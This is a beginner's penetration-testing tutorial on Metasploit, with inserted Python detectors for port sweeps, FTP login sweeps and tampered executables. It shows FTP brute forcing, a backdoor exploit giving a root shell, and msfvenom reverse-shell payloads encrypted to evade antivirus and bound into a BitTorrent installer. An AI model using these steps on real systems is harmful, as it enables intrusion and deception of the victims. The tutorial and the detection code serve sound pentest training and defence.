Metasploit Framework is the undisputed king of the penetration testing industry thanks to its many functionalities and ease of use. That is why we have put together this tutorial, created just for beginners, to help you get started quickly.
It’s a free and open source framework built in the Ruby programming language, with both a Command Line Interface (msfcli) and a Graphical User Interface (Armitage). It also has a web interface, a console interface (msfconsole) and an API (msgrpc) that can be used for automation with programming languages like Python. It has community and developer support and has been under development for years, with new modules and features arriving every day. Metasploit Framework is considered the best tool in penetration testing because it has everything required for three pentest phases, i.e. Enumeration, Exploitation and Post-exploitation.
A successful penetration test depends on the pentester using the right set of tools and methodologies. A penetration test consists of several phases, including Information Gathering, Enumeration, Exploitation and Privilege Escalation. During a penetration test, it’s not easy to manually download and run different exploits, scripts and tools separately. Metasploit isn’t just a bunch of exploits; it has modules that can aid in every phase of a successful penetration test. Metasploit offers an extensive exploit development environment, a wide range of exploits, and auxiliary modules that help in the reconnaissance and enumeration phases.
Metasploit Framework comes pre-installed in Linux security distributions like Kali Linux, Parrot Security OS, BlackArch etc., but if you’re on Windows or using some other Linux distro like Ubuntu, you have to install it manually. For Windows, you can download it from the following link: https://windows.metasploit.com/metasploitframework-latest.msi.
WARNING: Metasploit setup contains a large number of exploits and backdoor scripts that are flagged malicious by antivirus programs, so be sure to turn off antivirus protection for testing purposes.
For Ubuntu and other Linux distributions, the best method to install Metasploit is by using the Kali Linux repositories. Type the following commands to install it:
azad@ubuntu:~$ wget -q -O - archive.kali.org/archive-key.asc | sudo apt-key add -
# ">>" would run without root privileges, so append to sources.list through "sudo tee -a"
azad@ubuntu:~$ echo "deb http://mirrors.ocf.berkeley.edu/kali kali-rolling main non-free contrib" | sudo tee -a /etc/apt/sources.list
azad@ubuntu:~$ sudo apt update
azad@ubuntu:~$ sudo apt install metasploit-framework postgresql -y
WARNING: Don’t run “sudo apt upgrade” with Kali repositories in your “sources.list” file; it might crash your Linux distribution.
After installation, configure Metasploit and start the PostgreSQL database service:
azad@ubuntu:~$ sudo msfdb init
[i] Database already started
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
# Enable the postgresql service to start when Linux boots up
azad@ubuntu:~$ sudo update-rc.d postgresql enable
# Start the postgresql service
azad@ubuntu:~$ sudo service postgresql start
Now that Metasploit has been installed and set up, we can explore its services and features and see how to use it in a penetration test.
According to their functionality, Metasploit has three major types of modules, i.e. auxiliary, exploit and post-exploitation modules. Auxiliary modules can be used for scanning, service enumeration, fingerprinting and brute forcing different services, while exploit modules contain the exploit code used to gain access to remote systems, software and services. Post-exploitation modules, on the other hand, are used when you have initial access to the system with low privileges and you want to escalate your privileges to admin level or leave a backdoor for more persistent access. Other than these, Metasploit also has payload modules for different languages and operating systems, as well as encoders, encrypters and evasion modules that help in anti-virus evasion. There is a Metasploit utility, “msfvenom”, which is entirely dedicated to generating and encoding payloads for different languages and operating systems, but we’ll discuss it at the end of this article.
Auxiliary modules in Metasploit help in information gathering, service identification and enumeration of remote systems and services. They are not exploits, but they are a great help in information gathering, which eventually leads to better exploitation and penetration testing. Auxiliary modules can be used for port scanning, brute forcing, service identification and enumeration. Here we’ll have a brief overview of what auxiliary modules are capable of.
Metasploit has a db_nmap module that uses Nmap for port scanning and saves the result to the PostgreSQL database. You can use db_nmap the same way you use Nmap:
// Start Metasploit Framework console by typing msfconsole
$ sudo msfconsole
...snip...
msf5 > db_nmap -sV 192.168.18.1
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-22 17:05 PKT
[*] Nmap: Nmap scan report for _gateway (192.168.18.1)
[*] Nmap: Host is up (0.0023s latency).
[*] Nmap: Not shown: 995 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
...snip...
[*] Nmap: 23/tcp filtered telnet
[*] Nmap: 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
[*] Nmap: 80/tcp open ssl/http
...snip...
[*] Nmap: MAC Address: 00:00:00:00:00:FB (Unknown)
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 107.66 seconds
Other than db_nmap, Metasploit also has some custom port scanning modules that can be used from within the console. These are the auxiliary modules that can be used for port scanning:
msf5 > grep auxiliary search portscan
0 auxiliary/scanner/http/wordpress_pingback_access normal No WordPress Pingback Locator
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
Let’s use the “auxiliary/scanner/portscan/tcp” module to scan for open TCP ports. It’s similar to an Nmap scan with the “-sT” option enabled. To use this module, type the “use” command followed by the module path.
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
CONCURRENCY  10               yes       The number of concurrent ports to check per host
...snip...
PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS      1                yes       The number of concurrent threads (max one per host)
TIMEOUT      1000             yes       The socket connect timeout in milliseconds
// use the "RHOSTS" option to set the IP address of the remote machine whose ports you want to scan
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.18.7
rhosts => 192.168.18.7
// use the "run" or "exploit" command to start the module
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.18.7: - 192.168.18.7:22 - TCP OPEN
[+] 192.168.18.7: - 192.168.18.7:443 - TCP OPEN
[+] 192.168.18.7: - 192.168.18.7:902 - TCP OPEN
[+] 192.168.18.7: - 192.168.18.7:7070 - TCP OPEN
[*] 192.168.18.7: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So Metasploit is another excellent framework that can be used for port scanning. You can use its other port scanning modules in the same way if you don’t have Nmap installed on your machine.
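Seen from the scanned host, a TCP connect scan like the one above is a single source opening connections to many ports in a short time. The following added example (not part of the original tutorial) finds that pattern in iptables LOG-style kernel lines. The log lines are constructed, the scanner address 192.168.18.5 is hypothetical, and the thresholds are assumptions to tune per network.

```python
import re
from collections import defaultdict, deque

# iptables LOG line with kernel uptime stamp; "RES=... SYN URGP" matches a bare SYN only
PKT = re.compile(r"\[\s*(?P<t>\d+\.\d+)\] .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?"
                 r"PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+) .*?RES=\S+ SYN URGP=")

def detect_port_sweeps(lines, min_ports=20, window=10.0):
    """Return {(src, dst): sorted ports} for pairs where one source sent SYNs to
    at least min_ports distinct ports on one host within `window` seconds."""
    recent = defaultdict(deque)      # (src, dst) -> (time, port) still inside the window
    hits = defaultdict(set)
    for line in lines:
        m = PKT.search(line)
        if not m:
            continue                 # not a logged TCP SYN
        key, t = (m["src"], m["dst"]), float(m["t"])
        q = recent[key]
        q.append((t, int(m["dpt"])))
        while t - q[0][0] > window:  # drop packets that fell out of the window
            q.popleft()
        ports = {port for _, port in q}
        if len(ports) >= min_ports:
            hits[key] |= ports
    return {key: sorted(ports) for key, ports in hits.items()}

def sample_line(t, src, dst, dpt):
    """Build one constructed log line in iptables LOG format (sample data only)."""
    return ("Dec 22 17:05:01 ubuntu kernel: [%12.6f] IN=eth0 OUT= SRC=%s DST=%s LEN=60 "
            "TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=TCP SPT=40000 DPT=%d "
            "WINDOW=64240 RES=0x00 SYN URGP=0" % (t, src, dst, dpt))

# Constructed input: one source sweeping ports 1-40, one client reusing port 443
SAMPLE = [sample_line(100 + p * 0.01, "192.168.18.5", "192.168.18.7", p)
          for p in range(1, 41)]
SAMPLE += [sample_line(100 + i * 30, "192.168.18.9", "192.168.18.7", 443)
           for i in range(5)]

if __name__ == "__main__":
    for (src, dst), ports in detect_port_sweeps(SAMPLE).items():
        print("%s swept %d ports on %s" % (src, len(ports), dst))
```

This assumes a firewall rule that logs new inbound TCP connections; without such a rule there is nothing to parse.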
For brute forcing services, Hydra, Medusa and sometimes Nmap are used. But Metasploit also has some reliable modules that do the same. You can brute force a lot of network services using Metasploit, including but not limited to MSSQL, MySQL, VNC, telnet, SMTP, HTTP, SSH, FTP etc. Here we’ll try to brute force FTP using Metasploit as an example. We’ll use the default Metasploit dictionaries located in “/usr/share/wordlists/metasploit/”.
msf5 > grep login search ftp
26 auxiliary/scanner/ftp/ftp_login normal No FTP Authentication Scanner
msf5 > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
...snip...
PASSWORD                          no        A specific password to authenticate with
PASS_FILE                         no        File containing passwords, one per line
Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT            21               yes       The target port (TCP)
STOP_ON_SUCCESS  false            yes       Stop guessing when a credential works for a host
...snip...
USER_FILE                         no        File containing usernames, one per line
VERBOSE          true             yes       Whether to print output for all attempts
As you can see, this module requires the remote server’s IP address, the port number (21 is the default for FTP), a user file and a password file for the brute force. We can give this input to Metasploit using the “set” command:
msf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.18.16
RHOSTS => 192.168.18.16
msf5 auxiliary(scanner/ftp/ftp_login) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
USER_FILE => /usr/share/wordlists/metasploit/unix_users.txt
msf5 auxiliary(scanner/ftp/ftp_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
Now we can start this module by typing the “run” command (or “exploit”, as used below). Once started, the module tries each username and password combination until the correct pair is found.
msf5 auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.10.186:21 - 192.168.10.186:21 - Starting FTP login sweep
[!] 192.168.10.186:21 - No active DB -- Credential data will not be saved!
[-] 192.168.10.186:21 - 192.168.10.186:21 - LOGIN FAILED: 4Dgifts:msfadmin (Incorrect: )
[+] 192.168.10.186:21 - 192.168.10.186:21 - Login Successful: msfadmin:msfadmin
[-] 192.168.10.186:21 - 192.168.10.186:21 - LOGIN FAILED: 4Dgifts:admin (Incorrect: )
[-] 192.168.10.186:21 - 192.168.10.186:21 - LOGIN FAILED: 4Dgifts:123456 (Incorrect: )
You can see that the correct combination of username and password (msfadmin:msfadmin) was found using brute force.
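What a login sweep like this leaves behind on the FTP server, as an added example that is not part of the original tutorial: a detector for bursts of failed logins from one client, which also reports any account that logged in successfully during the burst. The log lines are constructed in vsftpd's log style (an assumption, since the page does not name the FTP server), and the threshold and window are illustrative.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                  r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect_login_sweeps(lines, max_failures=5, window=timedelta(seconds=60)):
    """Return per-client details for clients with at least max_failures failed
    logins inside the sliding window; "guessed" lists accounts that logged in
    successfully while failures from the same client were still recent."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    seen = defaultdict(lambda: {"failures": 0, "users": set(), "guessed": set()})
    flagged = set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue              # transfer records and unrelated lines
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, q = m["ip"], recent[m["ip"]]
        while q and ts - q[0] > window:
            q.popleft()
        if m["result"] == "FAIL":
            q.append(ts)
            seen[ip]["failures"] += 1
            seen[ip]["users"].add(m["user"])
            if len(q) >= max_failures:
                flagged.add(ip)
        elif q:                   # success in the middle of a run of failures
            seen[ip]["guessed"].add(m["user"])
    return {ip: seen[ip] for ip in flagged}

SAMPLE = [  # constructed log lines, not taken from a real server
    'Mon Dec 23 18:30:00 2019 [pid 2001] [alice] FAIL LOGIN: Client "192.168.10.50"',
    'Mon Dec 23 18:30:10 2019 [pid 2002] [alice] OK LOGIN: Client "192.168.10.50"',
    'Mon Dec 23 18:41:01 2019 [pid 2101] [4Dgifts] FAIL LOGIN: Client "192.168.10.182"',
    'Mon Dec 23 18:41:01 2019 [pid 2102] [msfadmin] OK LOGIN: Client "192.168.10.182"',
    'Mon Dec 23 18:41:02 2019 [pid 2103] [4Dgifts] FAIL LOGIN: Client "192.168.10.182"',
    'Mon Dec 23 18:41:02 2019 [pid 2104] [4Dgifts] FAIL LOGIN: Client "192.168.10.182"',
    'Mon Dec 23 18:41:03 2019 [pid 2105] [root] FAIL LOGIN: Client "192.168.10.182"',
    'Mon Dec 23 18:41:03 2019 [pid 2106] [root] FAIL LOGIN: Client "192.168.10.182"',
    'Mon Dec 23 18:41:04 2019 [pid 2107] [root] FAIL LOGIN: Client "192.168.10.182"',
]

if __name__ == "__main__":
    for ip, info in detect_login_sweeps(SAMPLE).items():
        print(ip, info["failures"], sorted(info["users"]), sorted(info["guessed"]))
```

An account listed under "guessed" should be treated as compromised: the sweep keeps going after the hit, so the successful login sits in the middle of the failures rather than at the end.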
Metasploit Framework has a large collection of exploit modules (located in “/usr/share/metasploit-framework/modules/exploits/”) which can be used to hunt for backdoors, vulnerabilities and misconfigurations in remote software and services. You can write your own exploit modules for Metasploit in the Ruby programming language, or you can make changes to an existing exploit using the “edit” command. Let’s exploit a vulnerability in UnrealIRCd using Metasploit as an example. We’ll start off by running an Nmap scan.
msf5 > db_nmap -A 192.168.10.186
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-23 18:41 PKT
Nmap scan report for 192.168.10.186
Host is up (0.00018s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
...snip...
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
...snip...
The Nmap scan shows that multiple ports are open, including port “6667” running the “UnrealIRCd” software. To see whether we can exploit it using Metasploit, we can use the “search” command to list related auxiliary and exploit modules.
msf5 > search ircd
Matching Modules
================
#  Name                                        Disclosure Date  Rank       Check  Description
-  ----                                        ---------------  ----       -----  -----------
0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution
It found one exploit in the database. Let’s give it a try and see how it works:
msf5 auxiliary(scanner/ftp/ftp_login) > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT   6667             yes       The target port (TCP)
The port is the same as the default, so we just need to set the remote IP address using the “RHOSTS” option:
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 192.168.10.186
rhosts => 192.168.10.186
Now we can start this module by typing “run”:
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 192.168.10.182:4444
[*] 192.168.10.186:6667 - Connected to 192.168.10.186:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.10.186:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GvLWs1XGGI5jhYLz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "GvLWs1XGGI5jhYLz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.182:4444 -> 192.168.10.186:56944) at 2019-12-23 18:42:38 +0500
whoami && id
root
uid=0(root) gid=0(root)
Metasploit’s exploit module successfully exploited this vulnerability and presented us with a remote shell on the victim machine. Using the same method, you can use the hundreds of exploits present in Metasploit to exploit vulnerabilities in remote systems.
Msfvenom is a Metasploit utility that is used to generate shellcode and backdoors, supporting almost every operating system and language. It’s a combination of “msfpayload” and “msfencode” that can be used to generate shellcode and to encode/encrypt it. You can see the supported languages and output formats using the following command:
Framework Executable Formats [--format <value>]
===============================================
Name
----
asp
aspx
aspx-exe
dll
elf
elf-so
exe
...snip...
Framework Transform Formats [--format <value>]
==============================================
Name
----
bash
c
csharp
hex
java
num
perl
...snip...
Using msfvenom, you can generate backdoors for Windows, Linux, Mac OS and other Unix-like operating systems. In this example, we’ll generate a payload for the Windows operating system (x64) using msfvenom:
azad@azad:~$ sudo msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=[Attacker's IP] LPORT=1337 -f exe > non-malicious.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 206403 bytes
Final size of exe file: 212992 bytes
azad@azad:~$ file non-malicious.exe
non-malicious.exe: PE32+ executable (GUI) x86-64, for MS Windows
You can also specify encoders and encrypters with your payload. The purpose of encoders and encrypters is to change the payload in such a way that an anti-virus solution cannot detect its signature. But the use of encoders is useless nowadays because anti-virus solutions have become very mature. Encryption of the payload, on the other hand, makes the detection ratio much better. To try msfvenom’s encoding, type:
azad@azad:~$ sudo msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -f exe > non-malicious.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 494 (iteration=0)
x86/shikata_ga_nai chosen with final size 494
Payload size: 494 bytes
Final size of exe file: 73802 bytes
For encryption, there are 4 encryption algorithm options available in msfvenom:
azad@azad:~$ sudo msfvenom --list encrypt
Framework Encryption Formats [--encrypt <value>]
================================================
Name
----
aes256
base64
rc4
xor
We’ll choose rc4 with the “--encrypt” option and then supply the encryption key using the “--encrypt-key” option. Using this method, our payload will be encrypted using rc4 encryption and will be decrypted when run on the victim machine. This encryption will help it evade the static analysis of anti-virus solutions.
azad@azad:~$ sudo msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=1337 --encrypt rc4 --encrypt-key "s3cr4t_k3y" -f exe > non-malicious.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 660 bytes
Final size of exe file: 73802 bytes
In this way, you can generate payloads for a variety of operating systems with multiple options.
Msfvenom also has an option “-x” which can be used to bind your malicious backdoor to a legit software executable file. The output is a legit-looking executable, but when run on the victim machine, it’ll run the original software as well as our backdoor as a service. As an example, we’ll try to backdoor a BitTorrent installation executable. Let’s locate it in our directory.
azad@azad:~$ file BitTorrent.exe
BitTorrent.exe: PE32 executable (GUI) Intel 80386, for MS Windows
# specify LHOST, LPORT and other options
azad@azad:~$ sudo msfvenom -p windows/meterpreter/reverse_https -x BitTorrent.exe -k LHOST=127.0.0.1 LPORT=1337 -f exe -o BitTorrent-1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 566 bytes
Final size of exe file: 168960 bytes
Saved as: BitTorrent-1.exe
azad@azad:~$ ls BitTorrent-1.exe
BitTorrent-1.exe
Our malicious shellcode is now embedded in the BitTorrent exe file. When the victim opens this executable, the BitTorrent software will run as usual, but it’ll also start our malicious backdoor service. Then you can run commands remotely on the victim machine using Metasploit’s “multi/handler” and perform further exploitation.
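Because a modified installer still runs the original software, the reliable check is to compare it with a copy obtained from the vendor before running it. The following added example (not part of the original tutorial) diffs the entry point and section table of two PE files. The two images are constructed header-only samples rather than msfvenom output, and all function names are hypothetical.

```python
import struct

EXEC, WRITE = 0x20000000, 0x80000000   # IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE

def parse_pe(data):
    """Return (entry_point_rva, {section_name: (rva, virtual_size, flags)})."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                           # optional header start
    entry = struct.unpack_from("<I", data, opt + 16)[0]     # AddressOfEntryPoint
    sections = {}
    for i in range(nsec):
        name, vsize, rva, _, _, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = (rva, vsize, flags)
    return entry, sections

def entry_section(entry, sections):
    """Name of the section that contains the entry point, or None."""
    for name, (rva, vsize, _) in sections.items():
        if rva <= entry < rva + vsize:
            return name
    return None

def diff_pe(trusted, candidate):
    """List header differences between a vendor reference and a candidate file."""
    t_entry, t_secs = parse_pe(trusted)
    c_entry, c_secs = parse_pe(candidate)
    findings = []
    if c_entry != t_entry:
        findings.append("entry point moved from %#x (%s) to %#x (%s)" % (
            t_entry, entry_section(t_entry, t_secs),
            c_entry, entry_section(c_entry, c_secs)))
    for name in sorted(set(c_secs) - set(t_secs)):
        findings.append("added section " + name)
    for name, (_, _, flags) in sorted(c_secs.items()):
        if flags & EXEC and flags & WRITE:
            findings.append("section %s is writable and executable" % name)
    return findings

def build_pe(entry, sections):
    """Build a header-only PE32 image (constructed sample data for this demo)."""
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(224, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, rva, vs, 0, 0, 0, 0, 0, fl)
                     for n, rva, vs, fl in sections)
    return b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + table

BASE = [(b".text", 0x1000, 0x5000, 0x60000020), (b".data", 0x6000, 0x1000, 0xC0000040)]
TRUSTED = build_pe(0x1000, BASE)                      # constructed reference image
CANDIDATE = build_pe(0x7000, BASE + [(b".xyz", 0x7000, 0x1000, 0xE0000020)])
print("\n".join(diff_pe(TRUSTED, CANDIDATE)))
```

An empty result only means the headers match; comparing a SHA-256 of the whole file against the vendor's published value, or verifying the file's code signature, covers changes that leave the headers untouched.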